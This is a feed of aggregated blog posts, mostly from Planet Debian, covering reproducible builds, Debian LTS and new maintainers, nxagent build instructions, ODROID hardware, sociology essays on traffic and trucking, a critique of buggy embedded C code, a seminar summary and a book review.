Patches submitted that have not made their way to the archive yet:

  • #787424 against emacs24 by Alexis Bienvenüe: order hashes when generating .el files
  • #823764 against sen by Daniel Shahaf: render the build timestamp in a consistent timezone
  • #823797 against openclonk by Alexis Bienvenüe: honour SOURCE_DATE_EPOCH
  • #823961 against herbstluftwm by Fabian Wolff: honour SOURCE_DATE_EPOCH
  • #824049 against emacs24 by Alexis Bienvenüe: make start value of gensym-counter reproducible
  • #824050 against emacs24 by Alexis Bienvenüe: make autoloads files reproducible
  • #824182 against codeblocks by Fabian Wolff: honour SOURCE_DATE_EPOCH
  • #824263 against cmake by Reiner Herrmann: sort file lists from file(GLOB ...)

Package reviews

344 reviews have been added, 125 have been updated and 20 have been removed this week.

14 FTBFS bugs have been reported by Chris Lamb.

tests.reproducible-builds.org

Misc.

Dan Kegel sent a mail to report about his experiments with a reproducible dpkg PPA for Ubuntu. According to him sudo add-apt-repository ppa:dank/dpkg && sudo apt-get update && sudo apt-get install dpkg should be enough to get reproducible builds on Ubuntu 16.04.

This week's edition was written by Ximin Luo and Holger Levsen and reviewed by a bunch of Reproducible builds folks on IRC.

Planet DebianMehdi Dogguy: Newmaint — Call for help

The process leading to the acceptance of new Debian Maintainers is mainly administrative today and is handled by the Newmaint team. In order to simplify this process further, the team wants to integrate their workflow into nm.debian.org's interface so that prospective maintainers can send their application online and the Newmaint team can review it from within the website.

We need your help to implement the missing pieces in nm.debian.org. It is written in Python and uses Django. If you have some experience with that, you should definitely join the newmaint-site mailing list and ask for the details. Enrico or someone else on the list will do their best to share their vision and explain the needed work in order to get this properly implemented!

You don't have to be a Debian Developer to contribute to this project. Anyone can step up and help!

Mark ShuttleworthThank you CC

Just to state publicly my gratitude that the Ubuntu Community Council has taken on their responsibilities very thoughtfully, and has demonstrated a proactive interest in keeping the community happy, healthy and unblocked. Their role is a critical one in the Ubuntu project, because we are at our best when we are constantly improving, and we are at our best when we are actively exploring ways to have completely different communities find common cause, common interest and common solutions. They say that it’s tough at the top because the easy problems don’t get escalated, and that is particularly true of the CC. So far, they are doing us proud.

 

Planet DebianSean Whitton: seoulviasfo

I spent last night in San Francisco on my way from Tucson to Seoul. This morning as I headed to the airport, I caught the end of a shouted conversation between a down-and-out and a couple of middle school-aged girls, who ran away back to the Asian Art museum as the conversation ended. A security guard told the man that he needed him to go away. The wealth divide so visible here just isn’t something you really see around Tucson.

I’m working on a new module for Propellor that’s complicated enough that I need to think carefully about the Haskell in order to produce a flexible and maintainable module. I’ve only been doing an hour or so of work on it per day, but the past few days I wake up each day with an idea for restructuring yesterday’s code. These ideas aren’t anything new to me: I think I’m just dredging up the understanding of Haskell I developed last year when I was studying it more actively. Hopefully this summer I can learn some new things about Haskell.

Riding on the “Bay Area Rapid Transit” (BART) feels like stepping back in time to the years of Microsoft’s ascendency, before we had a tech world dominated by Google and Facebook: the platform announcements are in a computerised voice that sounds like it was developed in the nineties. They’ll eventually replace the old trains—apparently some new ones are coming in 2017—so I feel privileged to have been able to ride the older ones. I feel the same about the Tube in London.

I really appreciate old but supremely reliable and effective public transport. It reminds me of the Debian toolchain: a bit creaky, but maintained over a sufficiently long period that it serves everyone a lot better than newer offerings, which tend to be produced with ulterior corporate motives.

Planet DebianMark Brown: OpenTAC sprint

This weekend Toby Churchill kindly hosted a hacking weekend for OpenTAC – myself, Michael Grzeschik, Steve McIntyre and Andy Simpkins got together to bring up the remaining bits of the hardware on the current board revision and to get some of the low-level tooling, like production flashing for the FTDI serial ports on the board, up and running. It was a very productive weekend: we verified that everything was working, with only a few small mods needed for the board. Personally, the main thing I worked on was getting most of an initial driver for the EMC1701 written. That was the one component without Linux support, and having a driver allowed us to verify that the power switching and measurement for the systems under test was working well.

There’s still at least one more board revision and quite a bit of software work to do (I’m hoping to get the EMC1701 upstream for v4.8), but it was great to finally see all the physical components of the system working well and to see it managing a system under test. This board revision should support all the software development that’s going to be needed for the final board.

Thanks to all who attended, Pengutronix for sponsoring Michael’s attendance and Toby Churchill for hosting!


Sociological ImagesContrary to Stereotypes, Women Lose More Time in Traffic than Men

“[A]n analysis of traffic can enrich sociological theory.” (Schmidt-Relenberg, 1968: 121)

Almost everywhere we go is a “gendered space.” Although men and women both go to grocery stores, different days of the week and times of the day are associated with different gender compositions of shoppers. Most of our jobs are gendered spaces. In fact, Census data show that roughly 30% of the 66,000,000 women in the U.S. labor force occupy only 10 of the 503 occupations listed on the U.S. Census. You’d probably be able to guess what some of these jobs are just as easily as you might be able to guess some of the very few Fortune 500 companies that have women CEOs. Sociologists refer to this phenomenon as occupational segregation, and it’s nothing new. Recently, though, I read about a gender-segregated space that is new (at least to me): traffic.

Photo from kkanous, Flickr Creative Commons.

When I picture traffic in my head, I think of grumpy men driving to jobs they hate, but this is misleading. Women actually make up the vast majority of congestion on the roads. One way of looking at this is to argue that women are causing more congestion on our roads. But another way to talk about this issue (and the way to talk about this issue that is consistent with actual research) is to say that women endure more congestion on the roads.

Women were actually the first market for household automobiles in the U.S. Men generally traveled to work by public transportation. Cars sold to households were marketed to women for daily errands. This is why, for instance, early automobiles had fancy radiator caps with things like wings, angels and goddesses on them. These were thought to appeal to women’s more fanciful desires.

Traffic increased a great deal when women moved into the labor force. But this is not exactly what accounts for the gender gap. In the 1950s, car trips that were work-related accounted for about 40% of all car use. Today that number is less than 16%. The vast majority of car trips are made for various errands: taking children to school, picking up groceries, eating out, going to or from day care, shopping, and more shopping.  And it’s women who are making most of these trips. It’s a less acknowledged portion of the “second shift” which typically highlights women’s disproportionate contribution to the division of labor inside the household even when they are working outside of the household as well.

Traffic research has shown that women are more than two times more likely than men to be taking someone else where they need to go when driving.  Men are  more likely to be driving themselves somewhere.  Women are also much more likely to string other errands onto the trips in which they are driving themselves somewhere (like stopping at the grocery store on the drive home, going to day care on the way to work, etc.). Traffic experts call this “trip chaining,” but the rest of us call it multi-tasking. What’s more, we also know that women, on average, leave just a bit later than men do for work, and as a result, are much more likely to be making those longer (and more involved) trips right in the middle of peak hours for traffic.

Who knew? It’s an under-acknowledged gendered space that deserves more attention (at least from sociologists). Traffic is awful, and if we count up all that extra time and add it to the second shift calculations made by Arlie Hochschild, I think we have a new form of inequality to complain about.

Tristan Bridges, PhD is a sociologist at the College at Brockport (SUNY). With CJ Pascoe, he is the editor of Exploring Masculinities: Identity, Inequality, Continuity and Change. He blogs at Inequality by (Interior) Design, where this post originally appeared. You can follow Dr. Bridges on Twitter.

(View original at https://thesocietypages.org/socimages)

Planet DebianMike Gabriel: NXv3 Rebase: Build nxagent against X.org 7.0

As already hinted in my previous blog post, here comes a short howto that explains how to test-build nxagent (v3) against a modularized X.org 7.0 source tree.

WARNING: Please note that mixing NX code and X.org code partially turns the original X.org code base into GPL-2 code. We are aware of this situation and are working on moving all NXv3-related GPL-2 code into the nxagent DDX code (xserver-xorg/hw/nxagent) or--if possible--dropping it completely. The result shall be a range of patches against X.org (licensable under the same license as the respective X.org files) and a GPL-2 licensed DDX (i.e. nxagent).

How to build this project

For the Brave and Playful

$ git clone https://git.arctica-project.org/nx-X11-rebase/build.git .
$ bash populate.sh sources.lst
$ ./buildit.sh

You can find the built tree in the _install/ sub-directory.

Please note that cloning Git repositories over the https protocol can be considerably slow. If you want to speed things up, consider signing up with our GitLab server.

For Developers...

... who have registered with our GitLab server.

$ git clone git@git.arctica-project.org:nx-X11-rebase/build.git .
$ bash populate.sh sources-devs.lst
$ ./buildit.sh

You will find the built tree in the _install/ sub-directory.

The related git repositories are in the repos/ sub-directory. All repos modified for NX have been cloned from the Arctica Project's GitLab server via SSH. Thus, you as a developer can commit changes on those repos and push back your changes to the GitLab server.

Required tools for building

Debian/Ubuntu and alike

  • build-essential
  • automake
  • gawk
  • git
  • pkg-config
  • libtool
  • libz-dev
  • libjpeg-dev
  • libpng-dev

In a one-liner command:

$ sudo apt-get install build-essential automake gawk git pkg-config libtool libz-dev libjpeg-dev libpng-dev

Fedora

If someone tries this out in a clean Fedora chroot environment, please let us know which packages are needed as build dependencies.

openSUSE

If someone tries this out in a clean openSUSE chroot environment, please let us know which packages are needed as build dependencies.

Testing the built nxagent and nxproxy

The tests/ subdir contains some scripts which can be used to test the compile results.

  • run-nxagent runs an nxagent and starts an nxproxy connection to it (do this as normal non-root user):
    $ tests/run-nxagent
    $ export DISPLAY=:9
    # launch e.g. MATE desktop environment on Debian, adapt session type and Xsession startup to your system / distribution
    $ STARTUP=mate-session /etc/X11/Xsession
    
  • run-nxproxy2nxproxy-test connects two nxproxy instances to each other using the nx compression protocol:
    $ tests/run-nxproxy2nxproxy-test
    $ export DISPLAY=:8
    # launch e.g. xterm and launch other apps from within that xterm process
    $ xterm &
    
  • more to come...

Notes on required X.org changes (NX_MODIFICATIONS)

For this build workflow to work, we (i.e. mostly Ulrich Sibiller) had to work several NoMachine patches into original X.org 7.0 code. Here is a list of modified X11 components with URLs pointing to the branch containing those changes:

xkbdata                            xorg/data/xkbdata                       rebasenx  1.0.1     https://git.arctica-project.org/nx-X11-rebase/xkbdata.git
libfontenc                         xorg/lib/libfontenc                     rebasenx  1.0.1     https://git.arctica-project.org/nx-X11-rebase/libfontenc.git
libSM                              xorg/lib/libSM                          rebasenx  1.0.0     https://git.arctica-project.org/nx-X11-rebase/libSM.git
libX11                             xorg/lib/libX11                         rebasenx  1.0.0     https://git.arctica-project.org/nx-X11-rebase/libX11.git
libXau                             xorg/lib/libXau                         rebasenx  1.0.0     https://git.arctica-project.org/nx-X11-rebase/libXau.git
libXfont                           xorg/lib/libXfont                       rebasenx  1.3.1     https://git.arctica-project.org/nx-X11-rebase/libXfont.git
libXrender                         xorg/lib/libXrender                     rebasenx  0.9.0.2   https://git.arctica-project.org/nx-X11-rebase/libXrender.git
xtrans                             xorg/lib/libxtrans                      rebasenx  1.0.0     https://git.arctica-project.org/nx-X11-rebase/libxtrans.git
kbproto                            xorg/proto/kbproto                      rebasenx  1.0.2     https://git.arctica-project.org/nx-X11-rebase/kbproto.git
xproto                             xorg/proto/xproto                       rebasenx  7.0.4     https://git.arctica-project.org/nx-X11-rebase/xproto.git
xorg-server                        xorg/xserver                            rebasenx  1.0.1     https://git.arctica-project.org/nx-X11-rebase/xserver.git
mesa                               mesa/mesa                               rebasenx  6.4.1     https://git.arctica-project.org/nx-X11-rebase/mesa.git

Credits

Nearly all of this has been achieved by Ulrich Sibiller. Thanks a lot for giving your time and energy to that. As the rebasing of NXv3 is a funded project supported by the Qindel Group, we are currently negotiating ways of monetarily appreciating Ulrich's intensive work on this. Thanks a lot, once more!!!

Feedback

If anyone of you feels like trying out the test build as described above, please consider signing up with the Arctica Project's GitLab server and reporting your issues there directly (against the repository nx-X11-rebase/build). Alternatively, feel free to contact us on IRC (Freenode): #arctica or subscribe to our developers' mailing list. Thank you.

light+love
Mike Gabriel

Planet DebianRaphaël Hertzog: Freexian’s report about Debian Long Term Support, April 2016

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In April, 116.75 work hours were dispatched among 9 paid contributors. Their reports are available:

  • Antoine Beaupré did 16h.
  • Ben Hutchings did 12.25 hours (out of 15 hours allocated + 5.50 extra hours remaining, he returned the remaining 8.25h to the pool).
  • Brian May did 10 hours.
  • Chris Lamb did nothing (instead of the 16 hours he was allocated, his hours have been redispatched to other contributors over May).
  • Guido Günther did 2 hours (out of 8 hours allocated + 3.25 remaining hours, leaving 9.25 extra hours for May).
  • Markus Koschany did 16 hours.
  • Santiago Ruano Rincón did 7.50 hours (out of 12h allocated + 3.50 remaining, thus keeping 8 extra hours for May).
  • Scott Kitterman posted a report for 6 hours made in March but did nothing in April. His 18 remaining hours have been returned to the pool. He decided to stop doing LTS work for now.
  • Thorsten Alteholz did 15.75 hours.

Many contributors did not use all their allocated hours. This is partly explained by the fact that in April Wheezy was still under the responsibility of the security team and they were not able to drive updates from start to finish.

In any case, this means that they have more hours available over May, and since the LTS period has now started, they should hopefully be able to make a good dent in the backlog of security updates.

Evolution of the situation

The number of sponsored hours reached a new record with 132 hours per month, thanks to two new gold sponsors (Babiel GmbH and Plat’Home). Plat’Home’s sponsorship was aimed at helping us maintain Debian 7 Wheezy on armel and armhf (on top of the already supported amd64 and i386). Hopefully the trend will continue so that we can reach our objective of funding the equivalent of a full-time position.

The security tracker currently lists 45 packages with a known CVE and the dla-needed.txt file lists 44 packages awaiting an update.

This is a bit more than the 15-20 open entries that we used to have at the end of the Debian 6 LTS period.

Thanks to our sponsors

New sponsors are in bold.


Planet Linux AustraliaBinh Nguyen: More PSYOPS, Social Systems, and More

- I think that most people would agree that the best social systems revolve around the idea that we have fair and just laws. If the size of the security apparatus exceeds a certain point (which seems to be happening in a lot of places) are we certain that we have the correct laws and societal laws in place? If they can't convince through standard argumentation then the policy is probably not

Worse Than FailureCodeSOD: Unstandard Lib

One of the hallmarks of “bad code” is when someone reinvents the wheel. In many CodeSODs, we show code that could be replaced with a one-line call to a built-in, standard library function.

That’s one of the advantages of a high-level language operating on modern hardware. Andrew doesn’t live in high-level land. He does embedded systems programming, often on platforms that don’t have conveniences like “standard libraries”, and so they end up reinventing the wheel from time to time.

For example, a third party wrote them some software. Among other things, they needed to implement their own versions of things like trigonometric functions, random functions, square root, and so on, including atoi, a function for converting arrays of characters to integers. Andrew was called upon to port this software to slightly different hardware.

In the header file, a comment promised that their atoi implementation was “compatible with ANSI atoi”. The implementation, however…

long atoi(char *s)
{
        char *p;
        int l;
        long m=1, t=0;  /* init some vars */
        bool negative = FALSE;

        /* check to see if its negative */
        if(*s == '-') {
                negative = TRUE;
                s++;
        }
        /* not negative is it a number */
        else if(s[0] < '0' || s[0] > '9')
        {
            return 0;
        }

        l = strlen(s);

        p = s + l;                           /* start from end of string */
        /* for each character in the string */
        do {
                p--;                         /* work backwards */
                t += m * (*p - '0');         /* add new value to total, multiplaying by current multiplier (1, 10, 100 etc.) */
                m = (m << 3) + (m << 1);     /* multiply multiplier by 10 (fast m * 10) */
                l--;                         /* decrement the count */
        } while(l);
        if(negative)
                t = -t;                      /* negate if we had a - at the beginning */
        return t;                            /* return the total */
}

The comments came from the original source. Now, this ANSI-compatible function has a rather nice boundary check to make sure the first character is either a “-” or a digit. Of course, that’s only the first character. Andrew helpfully provided some example calls that might have unexpected behaviors:

    atoi("2z") == 94
    atoi("-z") == -74 // at least it got the sign right
    atoi("") == [memory violation] // usually triggering a hardware interrupt

For bonus points, their versions of sin and cos can have drift of up to two degrees, and their tan implementation is just a macro of sin/cos, so it has even larger errors. Their rand function is biased towards zero, and their sqrt implementation uses convergence: it successively approximates the correct result. That much is fine, and pretty normal, but a good sqrt function uses a target epsilon to know when to stop: keep approximating until the error margin shrinks below the point where you care. This particular sqrt function just used a fixed number of iterations, so while sqrt(10) might give you 3.1623, sqrt(10000) gave you 1215.5.
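
For contrast, here is a minimal sketch of an epsilon-terminated square root using Newton's method. It is a generic illustration, not the vendor's actual code; the 1e-6 tolerance and the 100-iteration safety cap are arbitrary choices for the example.

#include <math.h>   /* fabs() */

/* Iterate until the estimate stops changing by more than a target epsilon,
 * instead of stopping after a fixed number of iterations. */
double sqrt_approx(double x)
{
        const double epsilon = 1e-6;    /* target error margin */
        int max_iter = 100;             /* safety cap so we always terminate */
        double guess;

        if (x < 0.0)
                return -1.0;            /* no real result; real code would signal an error */
        if (x == 0.0)
                return 0.0;

        guess = (x > 1.0) ? x / 2.0 : x;                  /* rough starting point */
        while (max_iter--) {
                double next = 0.5 * (guess + x / guess);  /* Newton step */
                if (fabs(next - guess) < epsilon)
                        return next;                      /* converged */
                guess = next;
        }
        return guess;
}

With a convergence test like this, sqrt_approx(10000) settles near 100 after a handful of extra iterations instead of being cut off mid-approximation.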


,

Planet DebianBits from Debian: New Debian Developers and Maintainers (March and April 2016)

The following contributors got their Debian Developer accounts in the last two months:

  • Sven Bartscher (kritzefitz)
  • Harlan Lieberman-Berg (hlieberman)

Congratulations!

LongNowWalter Mischel Seminar Media

This lecture was presented as part of The Long Now Foundation’s monthly Seminars About Long-term Thinking.

The Marshmallow Test: Mastering Self-Control

Monday May 2, 02016 – San Francisco

Video is up on the Mischel Seminar page.

*********************

Audio is up on the Mischel Seminar page, or you can subscribe to our podcast.

*********************

Thinking hot and cool – a summary by Stewart Brand

In the 1960s, Mischel and colleagues at Stanford launched a series of delayed-gratification experiments with young children using a method that later came to be known as “the marshmallow test.” A researcher whom the child knew and trusted, after playing some fun games together, suggested playing a “waiting game.” The researcher explained that the child could have either one or two of the highly attractive treats the child had chosen and was facing (marshmallows, cookies, pretzels)–depending on how long the child waited for them after the researcher left the room. The game was: at any time the child could ring a bell, and the researcher would come back immediately and the child could have one treat. To practice, the researcher left the room, the child rang the bell and the researcher came right back, saying, “You see, you brought me back. Now if you wait for me to come back by myself without ringing the bell or starting to eat a treat you can have both of them!!” The wait might be as long as 15 or 20 minutes. (About one third made it that far.)

The kids varied widely in how long they could stand it before ringing the bell. Mischel emphasizes that the focus of the research was to identify the specific cognitive strategies and mental mechanisms, as well as the developmental changes, that make delay of gratification possible–not to “test” or pigeonhole children. Between the ages of 4 and 6 years, for example, the older kids could delay their gratification longer, apparently as the impulse-overriding “executive function” of their maturing brains kicked in. And in some conditions it was easy for the children to wait, while under other conditions it was very difficult. The research sought to identify the cognitive skills that underlie willpower and long-term thinking and how they can be enhanced.

Longitudinal studies of the tested children suggested that something profound was going on. By the time they were adolescents, the kids who had been able to hold out longer for the bigger reward in some conditions were also likelier to have higher SAT scores, to function better socially, and to manage temptation and stress better. On into their adulthood, they were less likely to show extreme aggression, less likely to over-react if they became anxious about social rejection, and less likely to become obese. For the kids who did not hold out well and took the quick reward, Mischel said the findings suggested that “the inability to delay gratification can have quite serious potential negative effects.” (Mischel cautions that the longitudinal results are only correlations that describe group findings and do not allow accurate predictions for individual children.)

Can “delay ability” be trained? Mischel thinks it can, if we understand how our mind works. He and colleagues postulated a “Hot System” and a “Cool System” in the brain. (They are similar to Daniel Kahneman’s “System 1” and “System 2” in his book Thinking Fast and Slow.) The Hot System (Go!) is: emotional, simple, reflexive, fast, and centered in the amygdala. It develops early in the child and is exacerbated by stress. The Cool System (Know), on the other hand, is: cognitive rather than emotional, complex, reflective, slow, and centered in the frontal lobes and hippocampus. It develops later in the child and is made weaker by stress. In the Hot System the stimulus controls us; in the Cool System we control the stimulus.

You can chill a hot object of desire by representing it to yourself in Cool, abstract terms. Don’t think of the marshmallow as yummy and chewy; imagine it as round and white like a cotton ball. One little girl became patient by pretending she was looking at a picture of a marshmallow and “put a frame around it” in her head. “You can’t eat a picture,” she explained. (Girls were better at handling temptation than boys.)

While coolly defusing a temptation, you can also make Hot the delayed consequences of yielding to it. Mischel was a three-pack-a-day smoker ignoring all warnings about cancer until one day he saw a man on a gurney in Stanford Hospital. “His head was shaved, with little green X’s, and his chest was bare, with little green X’s.” A nurse told him the X’s were for where the radiation would be targeted. “I couldn’t shake the image. It made hot the delayed consequences of my smoking.” Mischel kept that image alive in his mind while reframing his cigarettes as sources of poison instead of relief, and he quit.

“If you don’t know how to delay gratification,” he said, “you don’t have a choice. If you do know how, you have a choice.”

Subscribe to our Seminar email list for updates and summaries.

Sociological ImagesThe Trucker, His Downfall, and the US Economy

According to this graphic by NPR, “truck driver” is the most common occupation in most US states:


But truck driving isn’t what it used to be. In 1980, truckers made the equivalent of $110,000 annually; today, the average trucker makes $40,000. What happened to this omnipresent American occupation?

At the Atlantic, sociologist Steve Viscelli describes his research on truckers. He took an entry level long-haul trucking job, interviewed workers, and studied its history. He found that the industry had essentially eviscerated worker pay, largely by turning truckers into independent contractors, misleading them about the benefits of this arrangement, and locking them into punitive contracts.

Viscelli argues that few truckers are fully informed as to what it means to be an independent contractor, at least at first. Trucking companies sell them on the idea that they’ll be their own boss and set their own hours, but they don’t emphasize that they will pay significantly more taxes, their own expenses, and the lease on a truck. Viscelli interviews one man who took home the equivalent of 50 cents an hour one week; another week he’d ended up owing the company $100. As independent contractors, he writes, truckers “end up working harder and earning far less than they would otherwise.”

If truckers want to get out of these contracts, the companies can hold their lease over their heads. Truckers sign a years-long contract to lease their truck along with a promise not to work for anyone else. If the contract is violated, the worker is on the hook for the entire lease. This could be tens of thousands of dollars, so the trucker can’t afford to quit. He’s no longer working, in other words, to make money; he’s just working, sometimes for years, to avoid debt.

The decimation of this once strongly middle class job is just one story among many. Add them all up — all of those occupations that no longer provide a middle class income, and the rise of lower paying jobs — and you get the shrinking of the middle class. Since 1970, fewer and fewer Americans qualify as middle income, defined as a household income that is between two-thirds of and double the median, or middle, household income.

You can see it shrink in this graphic by Deseret News using data from the Pew Research Center:


Part of the reason is that we have transitioned from an industrial economy to one that offers jobs primarily in service (low paying) and knowledge/information (high paying), but the other part is the restructuring of work to increasingly benefit owners, operators, and investors over workers. As the middle class has been shrinking, the productivity of American workers has been climbing, but the workers haven’t been the beneficiaries of their own work. Instead, employers have just been taking a larger and larger share of the value added that workers produce.

Figure from the Wall Street Journal with data from the Economic Policy Institute:


Between 1948 and 1973, productivity and wages increased at close to the same rate (97% and 91% respectively), but between 1973 and 2014, productivity has continued to climb (increasing by 72%), while wages have not (increasing by only 9%).

This is why so many Americans are struggling to stay afloat today. We’ve designed an economy that makes it ever more difficult to land in the middle class. Trucking isn’t the job it used to be, that is, because we aren’t the country we used to be.

Lisa Wade is a professor at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. Find her on Twitter, Facebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

Planet DebianSteinar H. Gunderson: stretch on ODROID XU4

I recently acquired an ODROID XU4. Despite being 32-bit, it's currently at the upper end of cheap SoC-based devboards; it's based on Exynos 5422 (which sits in Samsung Galaxy S5), which means 2 GHz quadcore Cortex-A15 (plus four slower Cortex-A7, in a big.LITTLE configuration), 2 GB RAM, USB 3.0, gigabit Ethernet, a Mali-T628 GPU and eMMC/SD storage. (My one gripe about the hardware is that you can't put on the case lid while still getting access to the serial console.)

Now, since I didn't want it for HTPC or something similar (I wanted a server/router I could carry with me), I didn't care much about the included Ubuntu derivative with all sorts of Samsung modifications, so instead, I went on to see if I could run Debian on it. (Spoiler alert: You can't exactly just download debian-installer and run it.) It turns out there are lots of people who make Debian images, but they're still filled with custom stuff here and there.

In recent times, people have put in heroic efforts to make unified ARM kernels; servers et al can now enumerate hardware using ACPI, while SoCs (such as the XU4) have a “device tree” file (loaded by the bootloader) containing a functional description of what hardware exists and how it's hooked up. And lo and behold, the 4.5.0 “armmp” kernel from stretch boots and mostly works! Well… except that there's no HDMI output. :-)

There are two goals I'd like to achieve by this exercise: First, it's usually much easier to upgrade things if they are close to mainline. (I wanted support for sch_fq, for instance, which isn't in 3.10, and the vendor kernel is 3.10.) Second, anything that doesn't work in Debian is suddenly exposed pretty harshly, and can have bugs filed against it and fixed—which benefits not only XU4 users (if nothing else, because the custom distros have to carry less delta), but usually also other boards, as most issues are of a somewhat more generic nature. Yet, the ideal seems to puzzle some of the more seasoned people in the ODROID user groups; I guess sometimes it's nice to come in as a naïve new user. :-)

So far, I've filed bugs or feature requests against the kernel (#823552, #824435), U-Boot (#824356), grub (#823955, #824399), and login (#824391)—and yes, that includes the aforementioned lack of HDMI output. Some of them are already fixed; with some luck, maybe the XU4 can be added next to the other Exynos5 board in the compatibility list for the armmp kernels at some point. :-)

You can get the image at http://storage.sesse.net/debian-xu4/. Be sure to read the README and the linked ODROID forum post.

Worse Than FailureDouble Play

How to play baseball, a manual for boys (1914)

Contracting seemed the best way for Ann-Marie to gain a foothold in the IT industry. She wasn't the best or the brightest, and her CV was heavy on toy languages and light on experience. But if she got a good solid chance, she knew her no-nonsense attitude and general intelligence would endear her to her boss.

Or maybe it would have, if it weren't for Cindy the Project Manager.

Cindy liked to chew gum at work. No, not chew—pop. It was all Ann-Marie could do to keep her face neutral during her onboarding, when Cindy handed over the employee handbook the team lead had asked her to deliver.

"So, like, these are our standards I guess? Whatever, you'll do fine, I'm not even worried."

Once she was gone, however, things started looking up. Unlike the last few places Ann-Marie had contracted, this one had JIRA and used it heavily, requiring all commits to include a JIRA number for tracking purposes. In addition, she was pleasantly surprised to see a QA department, and reasonable handoff practices: to be handed over to QA, the build had to be passing on the CI server, and earmarked as a release candidate. Commit messages were vital for keeping track of items in progress. They had to be descriptive, yet concise, and no more than one commit per JIRA item so that a relationship between tickets and commits could be established and tracked.

Yeah ... I could stay here, Ann-Marie decided. What's a little gum-popping in exchange for a Joel Number this high?

And so, eager to please, she threw herself into her work. On the first day, she closed five JIRA tickets—all small fixes in disparate portions of the application—as she tried to get a feel for the codebase.

"Wow, you like, really know your stuff," Cindy said, stopping by at the end of the day. "Our last guy didn't do anything for four days. This is going to be the best Bug Blitz ever. Well done!"

Ann-Marie stopped for a smoothie on her way home, confident she'd fit right in at this new job.

It was day three before the first incident happened. She was off to another great start, closing two tickets before 10:00 AM. At first, she assumed that was why Cindy was walking over, until she saw the frown on her manager's face.

"So, like, I don't know if you read the handbook, but we have a policy of not closing more than one ticket with the same JIRA number," Cindy said.

"Yeah, right, so you don't have to pick apart commits if you send one feature but not the other. Totally cool, definitely a best practice." Ann-Marie wondered why this was coming up. Had she accidentally broken policy? No, she'd been careful. One change, one commit.

"Right, right. So what's up with 44 and 89?" Cindy asked, rattling off the numbers with a punctuative pop.

"Uh ..." Ann-Marie pulled up the JIRA tab on her machine, rapidly navigating to 89 and skimming over the comments. "Oh, right, 89! That was fixed by the commit I did yesterday for 45. It had the same root cause."

"Riiight ... so they used the same commit," Cindy said.

"No, see?" Ann-Marie said. "Here, 45 was an error when downloading a document, and 89 was a blank document ID in the details for the document. The user couldn't download the document because it was sending them to a URL with a blank ID in it. The reason for that was because the file ID was omitted from the select columns in the database query that was shared between the two. By changing it so the document's file ID was included in that query, I killed two birds with one stone."

"Right, yeah, see, two birds, one commit. We have a strict policy against that. This can't happen again."

Ann-Marie blinked at Cindy. Was she just not getting through? "Surely something like this has happened before?"

Cindy gave her a flat, vacant look. "Not really." Pop. "We cool?" Pop.

"I ... I really don't know what to say here," Ann-Marie replied, flustered. "I mean, I agree with the policy, it makes it easier to roll back if one fix is broken, but this? This is a different situation entirely."

"You'll figure something out." Without waiting for a reply, Cindy turned and walked away.

Wonderful, Ann-Marie groaned inwardly. What do I do now?

Hoping against hope that she was just misunderstanding something, that someone else could enlighten her as to what Cindy's problems were and how to give her what she wanted, Ann-Marie took a walk to Garrett's cube. Garrett was a senior developer, one who'd been useful over the past few days as she'd rooted out a few harder-to-find bugs. Surely he'd run into this issue before. Maybe he'd even have an answer?

"Ooooh, yeah. THAT policy," Garrett began, and Ann-Marie's heart sank. "Cindy gets a little OCD about this stuff. We know exactly what you're talking about. Different developers go about resolving it in different ways. I, personally, simply commit one thing in such a way that 'breaks' the other issue again. Like, in your case, I would have both included the ID column and then intentionally blanked out the ID in the details view for my first commit. That commit gets mapped to the download error JIRA ticket. Then, I commit a second change that undoes the blanked-out ID in the view, that goes to the other ticket. It leaves a sour taste in your mouth, but you get used to it."

Ann-Marie sighed, feeling a headache creeping up on the edges of her temples. "I should have just marked it a duplicate," she mumbled to herself.

"Oh, no, Cindy doesn't like that either." Garrett assured her with a sympathetic look.

"Committed a whitespace change for the second ticket?" Ann-Marie fired back, not even bothering to get her hopes up.

"She reviews every single commit. Not that she's ever been a programmer, but she's taking night classes and has a keen eye for BS. Thankfully not keen enough to catch on to what we're doing with the intentional-breakage strategy, though."

Ann-Marie sighed. "Well, that's me out of ideas."

"Sorry," Garrett replied, a gentle smile on his face. "Sometimes you just have to throw in the towel and find a loophole."

For the duration of the Bug Blitz, Ann-Marie did just that, committing 'accidental' breakages for each duplicate bug—and even, once, for a triplicate ticket.

When the blitz finished and she was offered a permanent position, she politely declined. Stability was overrated.


Planet DebianRuss Allbery: Review: Gentleman Jole and the Red Queen

Review: Gentleman Jole and the Red Queen, by Lois McMaster Bujold

Series: Vorkosigan #15
Publisher: Baen
Copyright: 2015
Printing: February 2016
ISBN: 1-4767-8122-2
Format: Kindle
Pages: 352

This is very late in the Vorkosigan series, but it's also a return to a different protagonist and a change of gears to a very different type of story. Gentleman Jole and the Red Queen has Cordelia as a viewpoint character for, I believe, the first time since Barrayar, very early in the series. But you would still want to read the intermediate Miles books before this one given the nature of the story Bujold is telling here. It's a very character-centric, very quiet story that depends on the history of all the Vorkosigan characters and the connection the reader has built up with them. I think you have to be heavily invested in this series already to get that much out of this book.

The protagonist shift has a mildly irritating effect: I've read the whole series, but I was still a bit adrift at times because of how long it's been since I read the books focused on Cordelia. I only barely remember the events of Shards of Honor and Barrayar, which lay most of the foundations of this story. Bujold does have the characters retell them a bit, enough to get vaguely oriented, but I'm pretty sure I missed some subtle details that I wouldn't have if the entire series were fresh in memory. (Oh for the free time to re-read all of the series I'd like to re-read.)

Unlike recent entries in this series, Gentleman Jole and the Red Queen is not about politics, investigations, space (or ground) combat, war, or any of the other sources of drama that have shown up over the course of the series. It's not even about a wedding. The details (and sadly even the sub-genre) are all spoilers, both for this book and for the end of Cryoburn, so I can't go into many details. But I'm quite curious how the die-hard Baen fans would react to this book. It's a bit far afield from their interests.

Gentleman Jole is all about characters: about deciding what one wants to do with one's life, about families and how to navigate them, about boundaries and choices. Choices about what to communicate and what not to communicate, and, partly, about how to maintain sufficient boundaries against Miles to keep his manic energy from bulldozing into things that legitimately aren't any of his business. Since most of the rest of the series is about Miles poking into things that appear to not be his business and finding ways to fix things, it's an interesting shift. It also cast Cordelia in a new light for me: a combination of stability, self-assurance, and careful and thoughtful navigation around others' feelings. Not a lot happens in the traditional plot sense, so one's enjoyment of this book lives or dies on one's investment in the mundane life of the viewpoint characters. It worked for me.

